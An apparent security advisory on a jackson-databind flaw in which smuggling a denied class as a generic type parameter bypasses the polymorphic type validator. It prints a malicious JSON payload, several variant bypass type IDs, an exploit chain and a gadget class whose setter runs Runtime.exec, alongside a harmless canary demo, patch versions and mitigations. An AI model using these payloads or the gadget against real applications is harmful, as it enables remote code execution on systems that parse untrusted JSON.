How CVE-2026-54512 Works
Jackson-databind’s `PolymorphicTypeValidator` (PTV) is the primary safety mechanism guarding polymorphic deserialization. When polymorphic typing is enabled and a type identifier contains generic parameters (i.e., the type ID string contains `<`), `DatabindContext._resolveAndValidateGeneric()` validates only the raw container class name (the substring before `<`) against the configured PTV.
If the container type is approved, the method parses the full canonical type string via `TypeFactory.constructFromCanonical()` and returns the fully parameterized type—without ever validating the nested type arguments against the PTV. The nested type arguments are then resolved, instantiated, and populated as beans during deserialization.
An attacker who controls the type ID can therefore place a denied class as a generic type parameter of an allowed container, for example `java.util.ArrayList<com.evil.EvilGadget>`. The smuggled class is loaded via `Class.forName(name, true, loader)`, instantiated, and its properties are set from attacker-controlled JSON. This completely bypasses an explicitly configured PTV allow-list.
This is the same vulnerability class responsible for the historical sequence of jackson-databind deserialization CVEs; here it manifests as a validator bypass rather than a missing deny-list entry. The vulnerability affects versions from 2.10.0 (when PTV was introduced) up to, but not including, the fixed versions.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | FasterXML jackson-databind |
| Version | 2.10.0 – 2.18.7, 2.19.0 – 2.21.3, 3.0.0 – 3.1.3 |
| Vulnerability | PTV generic parameter bypass |
| Severity | High (CVSS 8.1) |
| Date | June 23, 2026 |
| Prediction | Patch already released (2.18.8 / 2.21.4 / 3.1.4) |
What Undercode Say: Analytics
Vulnerable Configuration Example:
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;

// Allow-list: only subtypes whose class name starts with "java.util.ArrayList"
BasicPolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
    .allowIfSubType("java.util.ArrayList")
    .build();
// The mapper-level PTV applies to @JsonTypeInfo(use = Id.CLASS) properties as well as to default typing
ObjectMapper mapper = JsonMapper.builder()
    .polymorphicTypeValidator(ptv)
    .build();
Malicious Payload (`Wrapper.value` is an `Object` field annotated with `@JsonTypeInfo`):
{"value":["java.util.ArrayList<com.evil.EvilGadget>",[{"cmd":"calc.exe"}]]}
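The following is an added, runnable demonstration of the setup described above; it is not code from this page or from the jackson-databind project. It assumes a `Wrapper` class with `WRAPPER_ARRAY` inclusion (the shape the payload above implies) and uses a hypothetical `Canary` class in place of a real gadget: its setter only records that it was called, so the program is safe to run. The first case (denied class used directly) is rejected on every version; whether the second case (the same class as a type parameter of the allowed `ArrayList`) is accepted or rejected depends on the jackson-databind version on the classpath.

```java
import java.util.ArrayList;
import java.util.List;

import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;

public class PtvGenericBypassDemo {

    // Hypothetical stand-in for a gadget: records the setter call instead of
    // running anything, so the demo is safe to execute.
    public static class Canary {
        static final List<String> calls = new ArrayList<>();
        private String cmd;

        public void setCmd(String cmd) {
            this.cmd = cmd;
            calls.add("Canary.setCmd(\"" + cmd + "\")");
        }

        public String getCmd() {
            return cmd;
        }
    }

    // Assumed shape of the page's Wrapper: a polymorphic Object property whose
    // type id travels as the first element of a two-element JSON array.
    public static class Wrapper {
        @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS, include = JsonTypeInfo.As.WRAPPER_ARRAY)
        public Object value;
    }

    // Same allow-list as the vulnerable configuration on the page.
    static ObjectMapper mapperWithArrayListAllowList() {
        BasicPolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("java.util.ArrayList")
                .build();
        return JsonMapper.builder().polymorphicTypeValidator(ptv).build();
    }

    // Returns the canary calls observed, or null if the PTV rejected the type id.
    static List<String> attempt(ObjectMapper mapper, String json) throws Exception {
        Canary.calls.clear();
        try {
            Wrapper w = mapper.readValue(json, Wrapper.class);
            System.out.println("  accepted as " + w.value.getClass().getName());
            return new ArrayList<>(Canary.calls);
        } catch (InvalidTypeIdException e) {
            System.out.println("  rejected by PTV: " + e.getTypeId());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = mapperWithArrayListAllowList();
        String canary = Canary.class.getName();

        // Direct use of the denied class: the PTV sees the name and rejects it.
        System.out.println("direct type id:");
        attempt(mapper, "{\"value\":[\"" + canary + "\",{\"cmd\":\"id\"}]}");

        // Same class smuggled as a type parameter of the allowed container.
        // On a vulnerable build the PTV only sees "java.util.ArrayList", the
        // element type is instantiated and Canary.setCmd runs per element;
        // patched builds (2.18.8 / 2.21.4 / 3.1.4 per the advisory) reject it.
        System.out.println("generic type id:");
        List<String> calls = attempt(mapper,
                "{\"value\":[\"java.util.ArrayList<" + canary + ">\",[{\"cmd\":\"id\"}]]}");
        if (calls != null && !calls.isEmpty()) {
            System.out.println("  PTV bypassed, observed " + calls);
        }
    }
}
```

Compile with jackson-databind (and its annotations/core dependencies) on the classpath and run it once against a version in the affected ranges and once against a patched one; the "generic type id" branch is the only output that should change between the two.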
Variant Payloads (all bypass an ArrayList/HashMap allow-list):
| Type ID | Smuggled Type Position |
|-|-|
| `java.util.ArrayList<com.evil.EvilGadget>` | list element |
| `java.util.HashMap<com.evil.EvilGadget,java.lang.String>` | map key |
| `java.util.HashMap<java.lang.String,com.evil.EvilGadget>` | map value |
| `java.util.ArrayList<java.util.ArrayList<com.evil.EvilGadget>>` | nested element |
| `java.util.ArrayList<com.evil.EvilGadget[]>` | array element |
Root Cause Analysis:
– `_resolveAndValidateGeneric()` → validates only raw container (before <)
– `TypeFactory.constructFromCanonical()` → returns full parameterized type
– Nested type arguments → never validated against PTV
– `Class.forName(name, true, loader)` → loads the smuggled class, which the bean deserializer then instantiates and populates
Exploit
Attack Prerequisites:
1. Application accepts untrusted JSON
2. Polymorphic typing is enabled (via `@JsonTypeInfo` or default typing)
3. A PTV is configured with an allow-list (e.g., `java.util.ArrayList`)
4. A gadget class (e.g., JNDI, TemplatesImpl, JDBC connection-pool) is present on the classpath
Exploit Chain:
1. Attacker crafts JSON with type ID `java.util.ArrayList<com.evil.Gadget>`
2. PTV approves `java.util.ArrayList` (raw container)
3. Nested `com.evil.Gadget` bypasses PTV validation entirely
4. `Class.forName()` loads the gadget class
5. Attacker-controlled JSON properties are injected via setters/fields
6. Gadget’s side effects trigger (JNDI lookup, RCE, etc.)
Example Gadget Class:
package com.evil;

// Illustrative gadget: any classpath class with a setter that has side effects will do
public class EvilGadget {
    private String cmd;

    // Invoked by the bean deserializer while populating {"cmd": "..."}
    public void setCmd(String cmd) throws Exception {
        this.cmd = cmd;
        Runtime.getRuntime().exec(cmd);
    }
}
Protection
Immediate Actions:
- Upgrade to patched versions:
  - `2.18.8` or later (fixes the 2.10.0 – 2.18.7 range)
  - `2.21.4` or later (fixes the 2.19.0 – 2.21.3 range)
  - `3.1.4` or later (fixes the 3.0.0 – 3.1.3 range)
If Upgrade Is Not Possible:
- Disable polymorphic typing entirely if not required
- Avoid deserializing untrusted JSON
- Use `@JsonTypeInfo(use = Id.NAME)` with explicit subtypes instead of `Id.CLASS`
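As an added example (not code from this page or from the jackson-databind project), here is the name-based alternative the last bullet recommends: the wire-level type id is a short logical name resolved against a closed set of registered subtypes, so a class name, with or without generic parameters, is never handed to `Class.forName` and no PTV allow-list is needed to keep it out. The `Value`/`TextValue`/`ListValue` types and the `type` property name are assumptions made for the demonstration.

```java
import java.util.List;

import com.fasterxml.jackson.annotation.JsonSubTypes;
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.json.JsonMapper;

public class NameBasedTypingDemo {

    // Closed set of subtypes: only the names registered here resolve to a class.
    // The payload never names a class, so nothing is looked up by class name.
    @JsonTypeInfo(use = JsonTypeInfo.Id.NAME, include = JsonTypeInfo.As.PROPERTY, property = "type")
    @JsonSubTypes({
        @JsonSubTypes.Type(value = TextValue.class, name = "text"),
        @JsonSubTypes.Type(value = ListValue.class, name = "list")
    })
    public interface Value {}

    public static class TextValue implements Value {
        public String text;
    }

    public static class ListValue implements Value {
        public List<String> items;
    }

    public static class Wrapper {
        public Value value;
    }

    // Returns the resolved subtype, or null when the type id is not a registered name.
    static Class<?> resolve(ObjectMapper mapper, String json) throws Exception {
        try {
            Wrapper w = mapper.readValue(json, Wrapper.class);
            return w.value.getClass();
        } catch (InvalidTypeIdException e) {
            // FAIL_ON_INVALID_SUBTYPE is on by default, so unknown names throw here
            System.out.println("rejected unknown type id: " + e.getTypeId());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // No PTV configured: with Id.NAME the class name in the payload is never consulted.
        ObjectMapper mapper = JsonMapper.builder().build();

        System.out.println("registered name -> "
                + resolve(mapper, "{\"value\":{\"type\":\"list\",\"items\":[\"a\",\"b\"]}}"));

        // Class names, plain or with generic parameters, are just unknown names here.
        resolve(mapper, "{\"value\":{\"type\":\"com.evil.EvilGadget\",\"cmd\":\"id\"}}");
        resolve(mapper, "{\"value\":{\"type\":\"java.util.ArrayList<com.evil.EvilGadget>\",\"cmd\":\"id\"}}");
    }
}
```

The trade-off is that every concrete type must be registered up front; that is exactly what makes the scheme safe, because the set of instantiable classes is fixed at build time rather than chosen by the sender.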
Patch Details:
The fix (commit 434d6c511) adds recursive validation of each non-trivial type parameter (and array element types appearing as parameters) through the full PTV chain, with documented exemptions for `Object` (wildcard resolution) and `Enum` types.
Detection:
- Search for `ObjectMapper` instances with `polymorphicTypeValidator()` configured
- Audit `@JsonTypeInfo(use = Id.CLASS)` usage
- Check for `activateDefaultTyping()` calls with PTV
Impact
- Bypass of the PTV allow-list, including the recommended `BasicPolymorphicTypeValidator` configured with name-prefix allow rules
- Arbitrary class instantiation of any type assignable to the container’s element/parameter position, with attacker-controlled property values (setter/field injection)
- Potential unauthenticated remote code execution when a class with exploitable side effects (JNDI lookup, JDBC/connection-pool gadgets, TemplatesImpl-style loaders, etc.) is present on the classpath
- Applications that accept untrusted JSON and rely on a configured PTV (the documented, security-conscious configuration) are affected
Affected Component: Maven `com.fasterxml.jackson.core:jackson-databind`
Sources:
Reported By: github.com